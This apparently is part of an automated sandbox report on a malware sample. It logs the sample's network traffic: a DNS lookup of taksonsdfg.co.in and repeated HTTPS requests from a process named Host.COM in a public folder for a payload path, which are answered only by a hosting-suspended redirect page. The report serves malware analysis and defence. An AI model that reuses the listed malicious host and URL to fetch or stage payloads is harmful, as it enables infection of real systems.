Nov 26, 2024 09:39:51.597335100 CET	49991	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.597340107 CET	443	49991	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:51.832663059 CET	49997	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.832730055 CET	443	49997	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:51.832858086 CET	49997	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.833076000 CET	49997	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.833118916 CET	443	49997	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:51.833177090 CET	49997	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.926709890 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.926769972 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:51.926877022 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.927159071 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:51.927169085 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.255036116 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.255156994 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.335000038 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.335012913 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.335397959 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.338895082 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.379327059 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.748307943 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.748368979 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.748435020 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.750519991 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.750519991 CET	49998	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.750535965 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.750545979 CET	443	49998	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.752688885 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.752743006 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:53.752813101 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.753421068 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:53.753437042 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.081046104 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.081655025 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.081687927 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.082550049 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.082555056 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.697063923 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.697129965 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.697223902 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.697248936 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.701229095 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.701322079 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.701427937 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.701448917 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.701456070 CET	50004	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.701461077 CET	443	50004	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.936079025 CET	50009	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.936132908 CET	443	50009	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.936233044 CET	50009	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.948256969 CET	50009	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:55.948329926 CET	443	50009	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:55.948395014 CET	50009	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:56.033332109 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:56.033369064 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:56.033452034 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:56.033843994 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:56.033853054 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.361262083 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.361368895 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.434727907 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.434743881 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.435127020 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.436916113 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.479368925 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.853291035 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.853358984 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.853430033 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.853663921 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.853678942 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.853693008 CET	50011	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.853699923 CET	443	50011	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.855027914 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.855062962 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:57.855139971 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.855407953 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:57.855418921 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.230813980 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.231463909 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:59.231482029 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.232429028 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:59.232435942 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.858225107 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.858376980 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.858493090 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:59.858510971 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.862166882 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.862246037 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:59.862358093 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:59.862375021 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:39:59.862406015 CET	50015	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:39:59.862413883 CET	443	50015	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:00.102391958 CET	50020	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:00.102448940 CET	443	50020	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:00.102524042 CET	50020	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:00.105597973 CET	50020	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:00.105684996 CET	443	50020	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:00.105748892 CET	50020	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:00.191503048 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:00.191543102 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:00.191648960 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:00.191982031 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:00.191992998 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:01.568571091 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:01.568741083 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:01.570110083 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:01.570116043 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:01.570357084 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:01.571613073 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:01.619330883 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:02.076570034 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:02.076653004 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:02.076714039 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:02.076941967 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:02.076957941 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:02.076970100 CET	50021	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:02.076976061 CET	443	50021	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:02.077939987 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:02.077990055 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:02.078057051 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:02.078285933 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:02.078299999 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:03.413857937 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:03.414640903 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:03.414669991 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:03.415761948 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:03.415770054 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.034683943 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.034739017 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.035334110 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.035353899 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.038238049 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.038367033 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.042779922 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.042810917 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.042828083 CET	50025	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.042834997 CET	443	50025	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.266165018 CET	50030	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.266186953 CET	443	50030	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.270272017 CET	50030	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.365750074 CET	50030	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.365892887 CET	443	50030	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.365984917 CET	50030	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.648308039 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.648343086 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:04.648430109 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.648991108 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:04.649003983 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.068977118 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.069106102 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.070772886 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.070785046 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.071022034 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.072309971 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.115326881 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.579663992 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.579823017 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.579904079 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.580024958 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.580024958 CET	50032	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.580044031 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.580048084 CET	443	50032	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.580956936 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.580990076 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:06.581052065 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.581259012 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:06.581273079 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.002366066 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.003113985 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.003130913 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.004009962 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.004023075 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.674432039 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.722043991 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.722055912 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.769953966 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.794205904 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.794228077 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.794255972 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.794409990 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.794459105 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.794459105 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.884185076 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.884213924 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:08.884247065 CET	50037	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:08.884253979 CET	443	50037	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:09.107073069 CET	50043	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:09.107142925 CET	443	50043	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:09.107254982 CET	50043	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:09.112833023 CET	50043	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:09.112891912 CET	443	50043	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:09.112941980 CET	50043	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:09.224670887 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:09.224709988 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:09.224800110 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:09.225362062 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:09.225377083 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:10.645215988 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:10.645304918 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:10.648828983 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:10.648838043 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:10.649127007 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:10.650480032 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:10.691325903 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:11.156142950 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:11.156220913 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:11.156312943 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:11.156544924 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:11.156560898 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:11.156575918 CET	50044	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:11.156580925 CET	443	50044	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:11.157530069 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:11.157598019 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:11.157757998 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:11.157922029 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:11.157941103 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:12.531663895 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:12.532490969 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:12.532526016 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:12.533560038 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:12.533565998 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.152015924 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.152061939 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.152149916 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:13.152179003 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.155432940 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.155495882 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:13.155553102 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:13.155570984 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.155595064 CET	50049	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:13.155601025 CET	443	50049	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.387088060 CET	50054	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:13.387130022 CET	443	50054	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.387191057 CET	50054	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:13.387572050 CET	50054	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:40:13.387641907 CET	443	50054	108.170.55.202	192.168.2.7
Nov 26, 2024 09:40:13.387727022 CET	50054	443	192.168.2.7	108.170.55.202

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 09:38:11.245034933 CET	61325	53	192.168.2.7	1.1.1.1
Nov 26, 2024 09:38:11.947681904 CET	53	61325	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 09:38:11.245034933 CET	192.168.2.7	1.1.1.1	0x8704	Standard query (0)	taksonsdfg.co.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 09:38:11.947681904 CET	1.1.1.1	192.168.2.7	0x8704	No error (0)	taksonsdfg.co.in		108.170.55.202	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

taksonsdfg.co.in

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:13 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:13 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:13 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:13 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49709	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:15 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:15 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:15 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:15 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:16 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49716	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:17 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:18 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:17 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
